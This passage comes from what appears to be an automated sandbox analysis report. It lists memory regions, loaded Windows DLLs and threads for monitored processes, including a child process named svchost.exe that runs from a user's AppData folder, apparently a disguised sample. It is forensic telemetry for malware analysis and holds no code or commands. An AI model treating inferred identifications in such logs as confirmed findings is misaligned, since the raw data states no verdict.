"c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 773 start_va = 0x1990000 end_va = 0x199ffff entry_point = 0x0 region_type = private name = "private_0x0000000001990000" filename = "" Region: id = 774 start_va = 0x1a30000 end_va = 0x1a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a30000" filename = "" Region: id = 775 start_va = 0x1a70000 end_va = 0x1aeffff entry_point = 0x0 region_type = private name = "private_0x0000000001a70000" filename = "" Region: id = 776 start_va = 0x1b20000 end_va = 0x1b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b20000" filename = "" Region: id = 777 start_va = 0x1c30000 end_va = 0x1caffff entry_point = 0x0 region_type = private name = "private_0x0000000001c30000" filename = "" Region: id = 778 start_va = 0x1cb0000 end_va = 0x1d2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 779 start_va = 0x1d70000 end_va = 0x1deffff entry_point = 0x0 region_type = private name = "private_0x0000000001d70000" filename = "" Region: id = 780 start_va = 0x1df0000 end_va = 0x1eeffff entry_point = 0x0 region_type = private name = "private_0x0000000001df0000" filename = "" Region: id = 781 start_va = 0x1f50000 end_va = 0x1fcffff entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 782 start_va = 0x2070000 end_va = 0x207ffff entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 783 start_va = 0x20f0000 end_va = 0x216ffff entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 784 start_va = 0x2200000 end_va = 0x227ffff entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 785 start_va = 0x2280000 end_va = 0x247ffff entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 786 start_va = 0x24b0000 end_va = 0x252ffff entry_point = 0x0 region_type = private name = "private_0x00000000024b0000" filename = "" Region: id = 787 start_va = 0x2590000 end_va = 0x260ffff entry_point = 0x0 region_type = private name = "private_0x0000000002590000" filename = "" Region: id = 788 start_va = 0x745d0000 end_va = 0x745d2fff entry_point = 0x745d0000 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 789 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x77a20000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 790 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x77b20000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 791 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 792 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 793 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 794 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 795 start_va = 0xffc20000 end_va = 0xffc2afff entry_point = 0xffc20000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 796 start_va = 0x7fef3780000 end_va = 0x7fef37dffff entry_point = 0x7fef3780000 region_type = mapped_file name = "w32time.dll" filename = "\\Windows\\System32\\w32time.dll" (normalized: "c:\\windows\\system32\\w32time.dll") Region: id = 797 start_va = 0x7fef58b0000 end_va = 0x7fef5987fff entry_point = 0x7fef58b0000 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 798 start_va = 0x7fef59c0000 end_va = 0x7fef59cbfff entry_point = 0x7fef59c0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 799 start_va = 0x7fef5ff0000 end_va = 0x7fef6063fff entry_point = 0x7fef5ff0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 800 start_va = 0x7fef6e00000 end_va = 0x7fef6e18fff entry_point = 0x7fef6e00000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 801 start_va = 0x7fef6fc0000 end_va = 0x7fef6fcffff entry_point = 0x7fef6fc0000 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 802 start_va = 0x7fef6fd0000 end_va = 0x7fef6fe1fff entry_point = 0x7fef6fd0000 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 803 start_va = 0x7fef7190000 end_va = 0x7fef71f3fff entry_point = 0x7fef7190000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 804 start_va = 0x7fef7200000 end_va = 0x7fef7270fff entry_point = 0x7fef7200000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 805 start_va = 0x7fef8a90000 end_va = 0x7fef8aa8fff entry_point = 0x7fef8a90000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 806 start_va = 0x7fef8ab0000 end_va = 0x7fef8ac4fff entry_point = 0x7fef8ab0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 807 start_va = 0x7fef8b10000 end_va = 0x7fef8b8bfff entry_point = 0x7fef8b10000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 808 start_va = 0x7fef90f0000 end_va = 0x7fef9107fff entry_point = 0x7fef90f0000 region_type = mapped_file name = "vmictimeprovider.dll" filename = "\\Windows\\System32\\vmictimeprovider.dll" (normalized: "c:\\windows\\system32\\vmictimeprovider.dll") Region: id = 809 start_va = 0x7fef9660000 end_va = 0x7fef9677fff entry_point = 0x7fef9660000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 810 start_va = 0x7fef9680000 end_va = 0x7fef9690fff entry_point = 0x7fef9680000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 811 start_va = 0x7fef96b0000 end_va = 0x7fef9702fff entry_point = 0x7fef96b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 812 start_va = 0x7fef97e0000 end_va = 0x7fef97e9fff entry_point = 0x7fef97e0000 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 813 start_va = 0x7fefb590000 end_va = 0x7fefb59afff entry_point = 0x7fefb590000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 814 start_va = 0x7fefb670000 end_va = 0x7fefb67afff entry_point = 0x7fefb670000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 815 start_va = 0x7fefb680000 end_va = 0x7fefb6a6fff entry_point = 0x7fefb680000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 816 start_va = 0x7fefb6b0000 end_va = 0x7fefb716fff entry_point = 0x7fefb6b0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 817 start_va = 0x7fefb740000 end_va = 0x7fefb74bfff entry_point = 0x7fefb740000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 818 start_va = 0x7fefb800000 end_va = 0x7fefb814fff entry_point = 0x7fefb800000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 819 start_va = 0x7fefbc10000 end_va = 0x7fefbc17fff entry_point = 0x7fefbc10000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 820 start_va = 0x7fefc080000 end_va = 0x7fefc097fff entry_point = 0x7fefc080000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 821 start_va = 0x7fefcd50000 end_va = 0x7fefcd5bfff entry_point = 0x7fefcd50000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 822 start_va = 0x7fefce20000 end_va = 0x7fefce26fff entry_point = 0x7fefce20000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 823 start_va = 0x7fefcf10000 end_va = 0x7fefcf2afff entry_point = 0x7fefcf10000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 824 start_va = 0x7fefcf30000 end_va = 0x7fefcf4dfff entry_point = 0x7fefcf30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 825 start_va = 0x7fefd080000 end_va = 0x7fefd089fff entry_point = 0x7fefd080000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 826 start_va = 0x7fefd180000 end_va = 0x7fefd1c6fff entry_point = 0x7fefd180000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 827 start_va = 0x7fefd270000 end_va = 0x7fefd29ffff entry_point = 0x7fefd270000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 828 start_va = 0x7fefd2a0000 end_va = 0x7fefd2fafff entry_point = 0x7fefd2a0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 829 start_va = 0x7fefd410000 end_va = 0x7fefd416fff entry_point = 0x7fefd410000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 830 start_va = 0x7fefd420000 end_va = 0x7fefd474fff entry_point = 0x7fefd420000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 831 start_va = 0x7fefd480000 end_va = 0x7fefd496fff entry_point = 0x7fefd480000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 832 start_va = 0x7fefd720000 end_va = 0x7fefd733fff entry_point = 0x7fefd720000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 833 start_va = 0x7fefda20000 end_va = 0x7fefda2afff entry_point = 0x7fefda20000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 834 start_va = 0x7fefda50000 end_va = 0x7fefda74fff entry_point = 0x7fefda50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 835 start_va = 0x7fefda80000 end_va = 0x7fefda8efff entry_point = 0x7fefda80000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 836 start_va = 0x7fefda90000 end_va = 0x7fefdb20fff entry_point = 0x7fefda90000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 837 start_va = 0x7fefdb70000 end_va = 0x7fefdb83fff entry_point = 0x7fefdb70000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 838 start_va = 0x7fefdb90000 end_va = 0x7fefdb9efff entry_point = 0x7fefdb90000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 839 start_va = 0x7fefdd60000 end_va = 0x7fefddcafff entry_point = 0x7fefdd60000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 840 start_va = 0x7fefdf60000 end_va = 0x7fefdfc6fff entry_point = 0x7fefdf60000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 841 start_va = 0x7fefed60000 end_va = 0x7fefed8dfff entry_point = 0x7fefed60000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 842 start_va = 0x7fefee30000 end_va = 0x7fefee7cfff entry_point = 0x7fefee30000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 843 start_va = 0x7feff0e0000 end_va = 0x7feff1bafff entry_point = 0x7feff0e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 844 start_va = 0x7feff1c0000 end_va = 0x7feff1defff entry_point = 0x7feff1c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 845 start_va = 0x7feff1e0000 end_va = 0x7feff2e8fff entry_point = 0x7feff1e0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 846 start_va = 0x7feff4d0000 end_va = 0x7feff598fff entry_point = 0x7feff4d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 847 start_va = 0x7feff5a0000 end_va = 0x7feff63efff entry_point = 0x7feff5a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 848 start_va = 0x7feff640000 end_va = 0x7feff6b0fff entry_point = 0x7feff640000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 849 start_va = 0x7feff860000 end_va = 0x7feff86dfff entry_point = 0x7feff860000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 850 start_va = 0x7feff9a0000 end_va = 0x7feffa38fff entry_point = 0x7feff9a0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 851 start_va = 0x7feffa40000 end_va = 0x7feffc42fff entry_point = 0x7feffa40000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 852 start_va = 0x7feffc50000 end_va = 0x7feffd7cfff entry_point = 0x7feffc50000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 853 start_va = 0x7feffd80000 end_va = 0x7feffe56fff entry_point = 0x7feffd80000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 854 start_va = 0x7feffec0000 end_va = 0x7feffec7fff entry_point = 0x7feffec0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 855 start_va = 0x7fefff60000 end_va = 0x7fefff60fff entry_point = 0x7fefff60000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 856 start_va = 0x7fffff94000 end_va = 0x7fffff95fff entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 857 start_va = 0x7fffff96000 end_va = 0x7fffff97fff entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 858 start_va = 0x7fffff98000 end_va = 0x7fffff99fff entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 859 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 860 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 861 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 862 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 863 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 864 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 865 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 866 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 867 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 868 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 869 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 870 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 871 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 872 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 873 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 874 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 875 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 876 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 45 os_tid = 0xaa4 Thread: id = 46 os_tid = 0x9d0 Thread: id = 47 os_tid = 0x99c Thread: id = 48 os_tid = 0x8d0 Thread: id = 49 os_tid = 0x5c4 Thread: id = 50 os_tid = 0x52c Thread: id = 51 os_tid = 0x7c4 Thread: id = 52 os_tid = 0x574 Thread: id = 53 os_tid = 0x458 Thread: id = 54 os_tid = 0x424 Thread: id = 55 os_tid = 0x414 Thread: id = 56 os_tid = 0x7cc Thread: id = 57 os_tid = 0x7b4 Thread: id = 58 os_tid = 0x7a8 Thread: id = 59 os_tid = 0x7a4 Thread: id = 60 os_tid = 0x174 Thread: id = 61 os_tid = 0x178 Thread: id = 62 os_tid = 0x130 Thread: id = 63 os_tid = 0x118 Thread: id = 74 os_tid = 0x9fc Thread: id = 81 os_tid = 0x5d0 Thread: id = 82 os_tid = 0x308 Thread: id = 83 os_tid = 0x530 Thread: id = 84 os_tid = 0x5e0 Thread: id = 85 os_tid = 0x418 Thread: id = 86 os_tid = 0x7e4 Thread: id = 87 os_tid = 0xbd4 Process: id = "4" image_name = "svchost.exe" filename = "c:\\users\\aetadzjz\\appdata\\roaming\\svchost.exe" page_root = "0x7754b000" os_pid = "0xbcc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xb50" cmd_line = "\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 912 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 913 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 914 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 915 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 916 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 917 start_va = 0x400000 end_va = 0x4b2fff entry_point = 0x400000 region_type = mapped_file name = "svchost.exe" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\svchost.exe") Region: id = 918 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 919 start_va = 0x77e20000 end_va = 0x77f9ffff entry_point = 0x77e20000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 920 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 921 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 922 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 923 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 924 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 925 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 926 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 927 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 928 start_va = 0x340000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 929 start_va = 0x752a0000 end_va = 0x752a7fff entry_point = 0x752a0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 930 start_va = 0x752b0000 end_va = 0x7530bfff entry_point = 0x752b0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 931 start_va = 0x75310000 end_va = 0x7534efff entry_point = 0x75310000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 932 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 933 start_va = 0x1a0000 end_va = 0x206fff entry_point = 0x1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 934 start_va = 0x660000 end_va = 0x75ffff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 935 start_va = 0x75f40000 end_va = 0x75f85fff entry_point = 0x75f40000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 936 start_va = 0x76220000 end_va = 0x7632ffff entry_point = 0x76220000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 937 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x0 region_type = private name = "private_0x0000000077a20000" filename = "" Region: id = 938 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x0 region_type = private name = "private_0x0000000077b20000" filename = "" Region: id = 939 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 940 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 941 start_va = 0x310000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 942 start_va = 0x74ba0000 end_va = 0x74ba8fff entry_point = 0x74ba0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 943 start_va = 0x75460000 end_va = 0x754e3fff entry_point = 0x75460000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 944 start_va = 0x75970000 end_va = 0x7597bfff entry_point = 0x75970000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 945 start_va = 0x75980000 end_va = 0x759dffff entry_point = 0x75980000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 946 start_va = 0x759e0000 end_va = 0x759f8fff entry_point = 0x759e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 947 start_va = 0x75a10000 end_va = 0x75abbfff entry_point = 0x75a10000 region_type = mapped_file name = "msvcrt.dll" filename = 